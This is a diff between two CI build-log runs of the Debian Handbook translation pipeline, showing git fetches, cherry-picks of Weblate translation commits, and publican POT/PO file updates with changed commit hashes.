+Initialized empty Git repository in /home/travis/tmp/base.D31sXm/build/.git/
 + setup_remote_local weblate git://git.weblate.org/debian-handbook.git git://git.weblate.org/debian-handbook.git jessie/master jessie/master/translation/weblate
 + local _GIT_REMOTE_NAME=weblate
 + local _GIT_REMOTE_FETCH=git://git.weblate.org/debian-handbook.git
@@ -6377,8 +6377,8 @@ From https://salsa.debian.org/hertzog/debian-handbook
  * branch              stretch/master -> FETCH_HEAD
  * [new branch]        stretch/master -> origin/stretch/master
 + git checkout -b stretch/master/translation/origin origin/stretch/master
-Switched to a new branch 'stretch/master/translation/origin'
 Branch 'stretch/master/translation/origin' set up to track remote branch 'stretch/master' from 'origin'.
+Switched to a new branch 'stretch/master/translation/origin'
 + test 2 -ne 0
 + local _GIT_REMOTE_BRANCH=jessie/master
 + local _GIT_LOCAL_BRANCH=jessie/master/translation/origin
@@ -6409,8 +6409,8 @@ From https://github.com/l/debian-handbook
  * branch              jessie/master/proposal/put_backcover_and_website_as_appendix -> FETCH_HEAD
  * [new branch]        jessie/master/proposal/put_backcover_and_website_as_appendix -> tweek/jessie/master/proposal/put_backcover_and_website_as_appendix
 + git checkout -b jessie/master/proposal/put_backcover_and_website_as_appendix tweek/jessie/master/proposal/put_backcover_and_website_as_appendix
-Switched to a new branch 'jessie/master/proposal/put_backcover_and_website_as_appendix'
 Branch 'jessie/master/proposal/put_backcover_and_website_as_appendix' set up to track remote branch 'jessie/master/proposal/put_backcover_and_website_as_appendix' from 'tweek'.
+Switched to a new branch 'jessie/master/proposal/put_backcover_and_website_as_appendix'
 + test 0 -ne 0
 + return 0
 + git --no-pager log --reverse --color --stat --pretty=fuller @{upstream}..HEAD
@@ -6788,20 +6788,35 @@ HEAD is now at 8f3f867b row 709
  Date: Tue Feb 12 22:37:31 2019 +0100
  1 file changed, 71 insertions(+), 81 deletions(-)
 + return 0
++ git_cherry_pick 07024dad570f0affa470d36e67cc666c6291d9a4
++ local _GIT_COMMIT_HASH=07024dad570f0affa470d36e67cc666c6291d9a4
++ shift 1
++ git cherry-pick --no-commit --keep-redundant-commits --allow-empty 07024dad570f0affa470d36e67cc666c6291d9a4
++ git log --pretty=%ad -1 07024dad570f0affa470d36e67cc666c6291d9a4
++ git log --pretty=%an -1 07024dad570f0affa470d36e67cc666c6291d9a4
++ git log --pretty=%ae -1 07024dad570f0affa470d36e67cc666c6291d9a4
++ git log --pretty=%cd -1 07024dad570f0affa470d36e67cc666c6291d9a4
++ git log --pretty=%cn -1 07024dad570f0affa470d36e67cc666c6291d9a4
++ git log --pretty=%ce -1 07024dad570f0affa470d36e67cc666c6291d9a4
++ GIT_AUTHOR_DATE=Sun Feb 17 09:00:00 2019 +0900 GIT_AUTHOR_NAME=AYANOKOUZI, Ryuunosuke GIT_AUTHOR_EMAIL=i38w7i3@yahoo.co.jp GIT_COMMITTER_DATE=Sun Feb 17 09:00:00 2019 +0900 GIT_COMMITTER_NAME=AYANOKOUZI, Ryuunosuke GIT_COMMITTER_EMAIL=i38w7i3@yahoo.co.jp git commit --no-verify --allow-empty --allow-empty-message --reuse-message=07024dad570f0affa470d36e67cc666c6291d9a4
+[stretch/master/build 33dfe1f7] cs-CZ: fix syntax error
+ Date: Sun Feb 17 09:00:00 2019 +0900
+ 3 files changed, 32 insertions(+), 32 deletions(-)
++ return 0
 + return 0
 + setup_build_branch_merge stretch/master/build jessie/master/proposal/put_backcover_and_website_as_appendix
 + local _GIT_LOCAL_BASE_BRANCH=stretch/master/build
 + local _GIT_LOCAL_TOPIC_BRANCH=jessie/master/proposal/put_backcover_and_website_as_appendix
 + git checkout stretch/master/build
 Already on 'stretch/master/build'
-Your branch is ahead of 'origin/stretch/master' by 20 commits.
+Your branch is ahead of 'origin/stretch/master' by 21 commits.
   (use "git push" to publish your local commits)
 + git merge --verbose --ff-only stretch/master/build jessie/master/proposal/put_backcover_and_website_as_appendix
 fatal: Not possible to fast-forward, aborting.
 + : merge NG!
 + git checkout stretch/master/build
 Already on 'stretch/master/build'
-Your branch is ahead of 'origin/stretch/master' by 20 commits.
+Your branch is ahead of 'origin/stretch/master' by 21 commits.
   (use "git push" to publish your local commits)
 + return 1
 + setup_build_branch_cherry_pick stretch/master/build jessie/master/proposal/put_backcover_and_website_as_appendix
@@ -6820,7 +6835,7 @@ Your branch is ahead of 'origin/stretch/master' by 20 commits.
 + git log --pretty=%cn -1 3ab4d18f12bb3673086af7844eb8a441ad5c2300
 + git log --pretty=%ce -1 3ab4d18f12bb3673086af7844eb8a441ad5c2300
 + GIT_AUTHOR_DATE=Fri Aug 5 09:00:00 2016 +0900 GIT_AUTHOR_NAME=AYANOKOUZI, Ryuunosuke GIT_AUTHOR_EMAIL=i38w7i3@yahoo.co.jp GIT_COMMITTER_DATE=Tue Sep 27 09:00:00 2016 +0900 GIT_COMMITTER_NAME=AYANOKOUZI, Ryuunosuke GIT_COMMITTER_EMAIL=i38w7i3@yahoo.co.jp git commit --no-verify --allow-empty --allow-empty-message --reuse-message=3ab4d18f12bb3673086af7844eb8a441ad5c2300
-[stretch/master/build 8095a437] Put backcover and website as appendix
+[stretch/master/build 29992274] Put backcover and website as appendix
  Date: Fri Aug 5 09:00:00 2016 +0900
  3 files changed, 9 insertions(+), 7 deletions(-)
 + return 0
@@ -6830,14 +6845,14 @@ Your branch is ahead of 'origin/stretch/master' by 20 commits.
 + local _GIT_LOCAL_TOPIC_BRANCH=jessie/master/translation/weblate
 + git checkout stretch/master/build
 Already on 'stretch/master/build'
-Your branch is ahead of 'origin/stretch/master' by 21 commits.
+Your branch is ahead of 'origin/stretch/master' by 22 commits.
   (use "git push" to publish your local commits)
 + git merge --verbose --ff-only stretch/master/build jessie/master/translation/weblate
 fatal: Not possible to fast-forward, aborting.
 + : merge NG!
 + git checkout stretch/master/build
 Already on 'stretch/master/build'
-Your branch is ahead of 'origin/stretch/master' by 21 commits.
+Your branch is ahead of 'origin/stretch/master' by 22 commits.
   (use "git push" to publish your local commits)
 + return 1
 + setup_build_branch_cherry_pick stretch/master/build jessie/master/translation/weblate
@@ -6856,7 +6871,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 ae10501e666a6bd4c6fd801ce2b461f8cc902384
 + git log --pretty=%ce -1 ae10501e666a6bd4c6fd801ce2b461f8cc902384
 + GIT_AUTHOR_DATE=Tue Jan 1 05:02:08 2019 +0000 GIT_AUTHOR_NAME=Andika Triwidada GIT_AUTHOR_EMAIL=andika@gmail.com GIT_COMMITTER_DATE=Tue Jan 1 06:49:45 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=ae10501e666a6bd4c6fd801ce2b461f8cc902384
-[stretch/master/build 9945c8e3] id-ID: Translated using Weblate.
+[stretch/master/build 637a240f] id-ID: Translated using Weblate.
  Author: Andika Triwidada <andika@gmail.com>
  Date: Tue Jan 1 05:02:08 2019 +0000
  1 file changed, 2 insertions(+), 2 deletions(-)
@@ -6872,7 +6887,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 9a5f11177fabb0b474320d6234b0401fc1d3be78
 + git log --pretty=%ce -1 9a5f11177fabb0b474320d6234b0401fc1d3be78
 + GIT_AUTHOR_DATE=Tue Jan 1 10:18:20 2019 +0000 GIT_AUTHOR_NAME=Alexandr Eremeev GIT_AUTHOR_EMAIL=ae125529@gmail.com GIT_COMMITTER_DATE=Tue Jan 1 11:52:50 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=9a5f11177fabb0b474320d6234b0401fc1d3be78
-[stretch/master/build 66a488bb] ru-RU: Translated using Weblate.
+[stretch/master/build abea855a] ru-RU: Translated using Weblate.
  Author: Alexandr Eremeev <ae125529@gmail.com>
  Date: Tue Jan 1 10:18:20 2019 +0000
  1 file changed, 2 insertions(+), 2 deletions(-)
@@ -6888,7 +6903,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 79d158d99a80e1e940b6ef14a6f882435b632e30
 + git log --pretty=%ce -1 79d158d99a80e1e940b6ef14a6f882435b632e30
 + GIT_AUTHOR_DATE=Sun Jan 13 17:45:22 2019 +0000 GIT_AUTHOR_NAME=Louies GIT_AUTHOR_EMAIL=louies0623@gmail.com GIT_COMMITTER_DATE=Sun Jan 13 18:56:44 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=79d158d99a80e1e940b6ef14a6f882435b632e30
-[stretch/master/build ae93499f] Translated using Weblate (Chinese (Traditional))
+[stretch/master/build 2e1c1bb6] Translated using Weblate (Chinese (Traditional))
  Author: Louies <louies0623@gmail.com>
  Date: Sun Jan 13 17:45:22 2019 +0000
  1 file changed, 24 insertions(+), 5 deletions(-)
@@ -6904,7 +6919,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 1d8478b0c8bff18d1808358add6140df267af990
 + git log --pretty=%ce -1 1d8478b0c8bff18d1808358add6140df267af990
 + GIT_AUTHOR_DATE=Sun Jan 13 17:35:14 2019 +0000 GIT_AUTHOR_NAME=Louies GIT_AUTHOR_EMAIL=louies0623@gmail.com GIT_COMMITTER_DATE=Sun Jan 13 18:56:46 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=1d8478b0c8bff18d1808358add6140df267af990
-[stretch/master/build 6c453dee] Translated using Weblate (Chinese (Traditional))
+[stretch/master/build df9abc76] Translated using Weblate (Chinese (Traditional))
  Author: Louies <louies0623@gmail.com>
  Date: Sun Jan 13 17:35:14 2019 +0000
  1 file changed, 29 insertions(+), 17 deletions(-)
@@ -6920,7 +6935,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 49efdb4f0aadb0d7080da3818988e7472b9ec121
 + git log --pretty=%ce -1 49efdb4f0aadb0d7080da3818988e7472b9ec121
 + GIT_AUTHOR_DATE=Mon Jan 14 04:20:15 2019 +0000 GIT_AUTHOR_NAME=Louies GIT_AUTHOR_EMAIL=louies0623@gmail.com GIT_COMMITTER_DATE=Mon Jan 14 05:54:19 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=49efdb4f0aadb0d7080da3818988e7472b9ec121
-[stretch/master/build 769d6005] zh-TW: Translated using Weblate.
+[stretch/master/build 329476cf] zh-TW: Translated using Weblate.
  Author: Louies <louies0623@gmail.com>
  Date: Mon Jan 14 04:20:15 2019 +0000
  1 file changed, 15 insertions(+), 26 deletions(-)
@@ -6937,7 +6952,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 3ddf8bd591076e43bcf55271f36d1273674867ea
 + git log --pretty=%ce -1 3ddf8bd591076e43bcf55271f36d1273674867ea
 + GIT_AUTHOR_DATE=Mon Jan 14 16:19:16 2019 +0000 GIT_AUTHOR_NAME=Louies GIT_AUTHOR_EMAIL=louies0623@gmail.com GIT_COMMITTER_DATE=Mon Jan 14 17:53:50 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=3ddf8bd591076e43bcf55271f36d1273674867ea
-[stretch/master/build 97094b1a] zh-TW: Translated using Weblate.
+[stretch/master/build 511b0976] zh-TW: Translated using Weblate.
  Author: Louies <louies0623@gmail.com>
  Date: Mon Jan 14 16:19:16 2019 +0000
  1 file changed, 36 insertions(+), 46 deletions(-)
@@ -6953,7 +6968,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 7ccbea27c60197af148630178491bf5c1e47b4c0
 + git log --pretty=%ce -1 7ccbea27c60197af148630178491bf5c1e47b4c0
 + GIT_AUTHOR_DATE=Tue Jan 15 02:06:01 2019 +0000 GIT_AUTHOR_NAME=Louies GIT_AUTHOR_EMAIL=louies0623@gmail.com GIT_COMMITTER_DATE=Tue Jan 15 03:55:51 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=7ccbea27c60197af148630178491bf5c1e47b4c0
-[stretch/master/build 9ad3978e] zh-TW: Translated using Weblate.
+[stretch/master/build dc9b02b8] zh-TW: Translated using Weblate.
  Author: Louies <louies0623@gmail.com>
  Date: Tue Jan 15 02:06:01 2019 +0000
  1 file changed, 2 insertions(+), 13 deletions(-)
@@ -6969,7 +6984,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 9df843cdcf661a459966b0f00ca833ae5d6dbd1d
 + git log --pretty=%ce -1 9df843cdcf661a459966b0f00ca833ae5d6dbd1d
 + GIT_AUTHOR_DATE=Tue Jan 15 01:53:32 2019 +0000 GIT_AUTHOR_NAME=Louies GIT_AUTHOR_EMAIL=louies0623@gmail.com GIT_COMMITTER_DATE=Tue Jan 15 03:56:02 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=9df843cdcf661a459966b0f00ca833ae5d6dbd1d
-[stretch/master/build 48c63ec2] zh-TW: Translated using Weblate.
+[stretch/master/build d651f9ec] zh-TW: Translated using Weblate.
  Author: Louies <louies0623@gmail.com>
  Date: Tue Jan 15 01:53:32 2019 +0000
  1 file changed, 13 insertions(+), 24 deletions(-)
@@ -6985,7 +7000,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 555dbe5efd0c8781b0634037e456922ffd514ad5
 + git log --pretty=%ce -1 555dbe5efd0c8781b0634037e456922ffd514ad5
 + GIT_AUTHOR_DATE=Tue Jan 15 03:55:49 2019 +0000 GIT_AUTHOR_NAME=Louies GIT_AUTHOR_EMAIL=louies0623@gmail.com GIT_COMMITTER_DATE=Tue Jan 15 04:56:36 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=555dbe5efd0c8781b0634037e456922ffd514ad5
-[stretch/master/build ddcd9e4c] zh-TW: Translated using Weblate.
+[stretch/master/build fe099a64] zh-TW: Translated using Weblate.
  Author: Louies <louies0623@gmail.com>
  Date: Tue Jan 15 03:55:49 2019 +0000
  1 file changed, 2 insertions(+), 2 deletions(-)
@@ -7001,7 +7016,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 7d269ec2943e12da7f3e319cf1f30485c68ab38a
 + git log --pretty=%ce -1 7d269ec2943e12da7f3e319cf1f30485c68ab38a
 + GIT_AUTHOR_DATE=Tue Jan 15 07:57:48 2019 +0000 GIT_AUTHOR_NAME=Louies GIT_AUTHOR_EMAIL=louies0623@gmail.com GIT_COMMITTER_DATE=Tue Jan 15 09:56:22 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=7d269ec2943e12da7f3e319cf1f30485c68ab38a
-[stretch/master/build 0ddd130a] zh-TW: Translated using Weblate.
+[stretch/master/build 61017a0e] zh-TW: Translated using Weblate.
  Author: Louies <louies0623@gmail.com>
  Date: Tue Jan 15 07:57:48 2019 +0000
  1 file changed, 25 insertions(+), 35 deletions(-)
@@ -7017,7 +7032,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 f187d1716434e69f5aa7aac5295b2b6a97f5018f
 + git log --pretty=%ce -1 f187d1716434e69f5aa7aac5295b2b6a97f5018f
 + GIT_AUTHOR_DATE=Tue Jan 15 08:48:54 2019 +0000 GIT_AUTHOR_NAME=Louies GIT_AUTHOR_EMAIL=louies0623@gmail.com GIT_COMMITTER_DATE=Tue Jan 15 09:56:23 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=f187d1716434e69f5aa7aac5295b2b6a97f5018f
-[stretch/master/build f6b1cd9c] zh-TW: Translated using Weblate.
+[stretch/master/build 2205d97f] zh-TW: Translated using Weblate.
  Author: Louies <louies0623@gmail.com>
  Date: Tue Jan 15 08:48:54 2019 +0000
  1 file changed, 14 insertions(+), 14 deletions(-)
@@ -7033,7 +7048,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 a4cf36e88fd11397376120ee0f2859b972110918
 + git log --pretty=%ce -1 a4cf36e88fd11397376120ee0f2859b972110918
 + GIT_AUTHOR_DATE=Sun Jan 20 00:50:34 2019 +0000 GIT_AUTHOR_NAME=Louies GIT_AUTHOR_EMAIL=louies0623@gmail.com GIT_COMMITTER_DATE=Sun Jan 20 01:55:37 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=a4cf36e88fd11397376120ee0f2859b972110918
-[stretch/master/build 499f2403] zh-TW: Translated using Weblate.
+[stretch/master/build c4f81648] zh-TW: Translated using Weblate.
  Author: Louies <louies0623@gmail.com>
  Date: Sun Jan 20 00:50:34 2019 +0000
  1 file changed, 2 insertions(+), 13 deletions(-)
@@ -7049,7 +7064,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 efd2d8b21754a98cdf917bf7745bbe8ff4452491
 + git log --pretty=%ce -1 efd2d8b21754a98cdf917bf7745bbe8ff4452491
 + GIT_AUTHOR_DATE=Sun Jan 20 00:50:32 2019 +0000 GIT_AUTHOR_NAME=Louies GIT_AUTHOR_EMAIL=louies0623@gmail.com GIT_COMMITTER_DATE=Sun Jan 20 01:55:39 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=efd2d8b21754a98cdf917bf7745bbe8ff4452491
-[stretch/master/build 0b805a1e] zh-TW: Translated using Weblate.
+[stretch/master/build 139088f8] zh-TW: Translated using Weblate.
  Author: Louies <louies0623@gmail.com>
  Date: Sun Jan 20 00:50:32 2019 +0000
  1 file changed, 2 insertions(+), 2 deletions(-)
@@ -7065,7 +7080,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 996b79c58a63a51dd38c5e0dec630b35295642a2
 + git log --pretty=%ce -1 996b79c58a63a51dd38c5e0dec630b35295642a2
 + GIT_AUTHOR_DATE=Sat Jan 19 23:49:34 2019 +0000 GIT_AUTHOR_NAME=Louies GIT_AUTHOR_EMAIL=louies0623@gmail.com GIT_COMMITTER_DATE=Sun Jan 20 01:55:48 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=996b79c58a63a51dd38c5e0dec630b35295642a2
-[stretch/master/build c47ff46c] zh-TW: Translated using Weblate.
+[stretch/master/build 41248e3d] zh-TW: Translated using Weblate.
  Author: Louies <louies0623@gmail.com>
  Date: Sat Jan 19 23:49:34 2019 +0000
  1 file changed, 3 insertions(+), 3 deletions(-)
@@ -7081,7 +7096,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 ed7750948db779ff48f9c1d5609c0c105e34d71f
 + git log --pretty=%ce -1 ed7750948db779ff48f9c1d5609c0c105e34d71f
 + GIT_AUTHOR_DATE=Sun Jan 20 00:50:33 2019 +0000 GIT_AUTHOR_NAME=Louies GIT_AUTHOR_EMAIL=louies0623@gmail.com GIT_COMMITTER_DATE=Sun Jan 20 01:55:51 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=ed7750948db779ff48f9c1d5609c0c105e34d71f
-[stretch/master/build ae1464ef] zh-TW: Translated using Weblate.
+[stretch/master/build 8262a0f7] zh-TW: Translated using Weblate.
  Author: Louies <louies0623@gmail.com>
  Date: Sun Jan 20 00:50:33 2019 +0000
  1 file changed, 2 insertions(+), 2 deletions(-)
@@ -7097,7 +7112,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 1435b9e65a090375ea50c95069ffcf70ebcbe4b3
 + git log --pretty=%ce -1 1435b9e65a090375ea50c95069ffcf70ebcbe4b3
 + GIT_AUTHOR_DATE=Sun Jan 27 14:20:34 2019 +0000 GIT_AUTHOR_NAME=Louies GIT_AUTHOR_EMAIL=louies0623@gmail.com GIT_COMMITTER_DATE=Sun Jan 27 15:56:35 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=1435b9e65a090375ea50c95069ffcf70ebcbe4b3
-[stretch/master/build 70a8c2ad] zh-TW: Translated using Weblate.
+[stretch/master/build 6fd01754] zh-TW: Translated using Weblate.
  Author: Louies <louies0623@gmail.com>
  Date: Sun Jan 27 14:20:34 2019 +0000
  1 file changed, 3 insertions(+), 3 deletions(-)
@@ -7113,7 +7128,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 2ca9f35374b8305bfe09c6bb2ec533d3f49a8e81
 + git log --pretty=%ce -1 2ca9f35374b8305bfe09c6bb2ec533d3f49a8e81
 + GIT_AUTHOR_DATE=Fri Feb 15 12:51:11 2019 +0000 GIT_AUTHOR_NAME=Andika Triwidada GIT_AUTHOR_EMAIL=andika@gmail.com GIT_COMMITTER_DATE=Fri Feb 15 14:52:13 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=2ca9f35374b8305bfe09c6bb2ec533d3f49a8e81
-[stretch/master/build f2c256b0] id-ID: Translated using Weblate.
+[stretch/master/build 39d5d629] id-ID: Translated using Weblate.
  Author: Andika Triwidada <andika@gmail.com>
  Date: Fri Feb 15 12:51:11 2019 +0000
  1 file changed, 6 insertions(+), 11 deletions(-)
@@ -7129,7 +7144,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 12741125e1fe9014671d0402205071428ed9516b
 + git log --pretty=%ce -1 12741125e1fe9014671d0402205071428ed9516b
 + GIT_AUTHOR_DATE=Sat Feb 16 11:45:18 2019 +0000 GIT_AUTHOR_NAME=Andika Triwidada GIT_AUTHOR_EMAIL=andika@gmail.com GIT_COMMITTER_DATE=Sat Feb 16 13:51:09 2019 +0100 GIT_COMMITTER_NAME=Hosted Weblate GIT_COMMITTER_EMAIL=hosted@weblate.org git commit --no-verify --allow-empty --allow-empty-message --reuse-message=12741125e1fe9014671d0402205071428ed9516b
-[stretch/master/build c6573ade] id-ID: Translated using Weblate.
+[stretch/master/build 6ddad718] id-ID: Translated using Weblate.
  Author: Andika Triwidada <andika@gmail.com>
  Date: Sat Feb 16 11:45:18 2019 +0000
  1 file changed, 2 insertions(+), 3 deletions(-)
@@ -7145,7 +7160,7 @@ Your branch is ahead of 'origin/stretch/master' by 21 commits.
 + git log --pretty=%cn -1 be47c15e54bd9050e49ac6399cd2402f0ac49880
 + git log --pretty=%ce -1 be47c15e54bd9050e49ac6399cd2402f0ac49880
 + GIT_AUTHOR_DATE=Sat Feb 16 11:45:18 2019 +0000 GIT_AUTHOR_NAME=AYANOKOUZI, Ryuunosuke GIT_AUTHOR_EMAIL=i38w7i3@yahoo.co.jp GIT_COMMITTER_DATE=Sat Feb 16 13:51:09 2019 +0100 GIT_COMMITTER_NAME=AYANOKOUZI, Ryuunosuke GIT_COMMITTER_EMAIL=i38w7i3@yahoo.co.jp git commit --no-verify --allow-empty --allow-empty-message --reuse-message=be47c15e54bd9050e49ac6399cd2402f0ac49880
-[stretch/master/build 084d29ed] Sync PO files to Weblate
+[stretch/master/build 50313138] Sync PO files to Weblate
  Date: Sat Feb 16 11:45:18 2019 +0000
 + return 0
 + return 0
@@ -7186,7 +7201,7 @@ $ publican \
 	update_pot \
 ;
 
-[stretch/master/build 9c8e36ba] Update POT files
+[stretch/master/build 222d9d6e] Update POT files
  25 files changed, 774 insertions(+), 702 deletions(-)
  rewrite pot/00a_preface.pot (95%)
 + publican update_po --msgmerge --previous --langs=all --firstname=Ryuunosuke --surname=AYANOKOUZI --email=i38w7i3@yahoo.co.jp
@@ -7856,7 +7871,7 @@ $ publican \
 	--email='i38w7i3@yahoo.co.jp' \
 ;
 
-[stretch/master/build 3e01add8] Update PO files
+[stretch/master/build 9e7002d4] Update PO files
  377 files changed, 49893 insertions(+), 49893 deletions(-)
  rewrite ar-MA/00a_preface.po (96%)
  rewrite cs-CZ/00a_preface.po (97%)
@@ -8141,7 +8156,20 @@ CommitDate: Tue Feb 12 22:37:31 2019 +0100
  cs-CZ/01_the-debian-project.po | 152 +++++++++++++++++++----------------------
  1 file changed, 71 insertions(+), 81 deletions(-)
 
-commit 8095a437b54b621a3d023c35ead3a9568aff2dd0
+commit 33dfe1f7110bd251f6245897b681979f04171a17
+Author:     AYANOKOUZI, Ryuunosuke <i38w7i3@yahoo.co.jp>
+AuthorDate: Sun Feb 17 09:00:00 2019 +0900
+Commit:     AYANOKOUZI, Ryuunosuke <i38w7i3@yahoo.co.jp>
+CommitDate: Sun Feb 17 09:00:00 2019 +0900
+
+    cs-CZ: fix syntax error
+
+ cs-CZ/00a_preface.po           |  4 ++--
+ cs-CZ/00b_foreword.po          | 28 ++++++++++++++--------------
+ cs-CZ/01_the-debian-project.po | 32 ++++++++++++++++----------------
+ 3 files changed, 32 insertions(+), 32 deletions(-)
+
+commit 299922745782bd964e94dfe718ede1c97f1d169e
 Author:     AYANOKOUZI, Ryuunosuke <i38w7i3@yahoo.co.jp>
 AuthorDate: Fri Aug 5 09:00:00 2016 +0900
 Commit:     AYANOKOUZI, Ryuunosuke <i38w7i3@yahoo.co.jp>
@@ -8154,7 +8182,7 @@ CommitDate: Tue Sep 27 09:00:00 2016 +0900
  en-US/debian-handbook.xml |  2 ++
  3 files changed, 9 insertions(+), 7 deletions(-)
 
-commit 9945c8e322c1666f98e31e545966c391ea51acbb
+commit 637a240f7f3abd06cbb518994afaccaa4147119b
 Author:     Andika Triwidada <andika@gmail.com>
 AuthorDate: Tue Jan 1 05:02:08 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8165,7 +8193,7 @@ CommitDate: Tue Jan 1 06:49:45 2019 +0100
  id-ID/12_advanced-administration.po | 4 ++--
  1 file changed, 2 insertions(+), 2 deletions(-)
 
-commit 66a488bb2be4f169bbff1cc0bec1c40d94d3d11c
+commit abea855a99b59e7f42f018d8c5a40f7b81f20fca
 Author:     Alexandr Eremeev <ae125529@gmail.com>
 AuthorDate: Tue Jan 1 10:18:20 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8176,7 +8204,7 @@ CommitDate: Tue Jan 1 11:52:50 2019 +0100
  ru-RU/08_basic-configuration.po | 4 ++--
  1 file changed, 2 insertions(+), 2 deletions(-)
 
-commit ae93499fbc5034014514608ab85bffa824979226
+commit 2e1c1bb6563fde43b2ed281180dbe6287554e3f5
 Author:     Louies <louies0623@gmail.com>
 AuthorDate: Sun Jan 13 17:45:22 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8189,7 +8217,7 @@ CommitDate: Sun Jan 13 18:56:44 2019 +0100
  zh-TW/99_backcover.po | 29 ++++++++++++++++++++++++-----
  1 file changed, 24 insertions(+), 5 deletions(-)
 
-commit 6c453dee37deef9ffb374570887be914c28fc2c1
+commit df9abc7681ba9934be3e45470760f21d54f6c5d9
 Author:     Louies <louies0623@gmail.com>
 AuthorDate: Sun Jan 13 17:35:14 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8202,7 +8230,7 @@ CommitDate: Sun Jan 13 18:56:46 2019 +0100
  zh-TW/99_website.po | 46 +++++++++++++++++++++++++++++-----------------
  1 file changed, 29 insertions(+), 17 deletions(-)
 
-commit 769d600554d94c3e335a165ed283ade5b567f59c
+commit 329476cf0f284314c86ea64823fdd476f5eb4c08
 Author:     Louies <louies0623@gmail.com>
 AuthorDate: Mon Jan 14 04:20:15 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8213,7 +8241,7 @@ CommitDate: Mon Jan 14 05:54:19 2019 +0100
  zh-TW/Author_Group.po | 19 ++++---------------
  1 file changed, 4 insertions(+), 15 deletions(-)
 
-commit 97094b1a7354eee2e1f6daecbd914b5ee74e3c8a
+commit 511b09763ed49ad310fd99b96c95f6007442a49b
 Author:     Louies <louies0623@gmail.com>
 AuthorDate: Mon Jan 14 16:19:16 2019 +0000
 Commit:     Hosted Weblate <hosted@weblate.org>
@@ -8224,7 +8252,7 @@ CommitDate: Mon Jan 14 17:53:50 2019 +0100
  zh-TW/90_derivative-distributions.po | 82 ++++++++++++++++--------------------
  1 file changed, 36 insertions(+), 46 deletions(-)
 
-commit 9ad3978eac8af5fbb32932c33eeeeeab982345cf
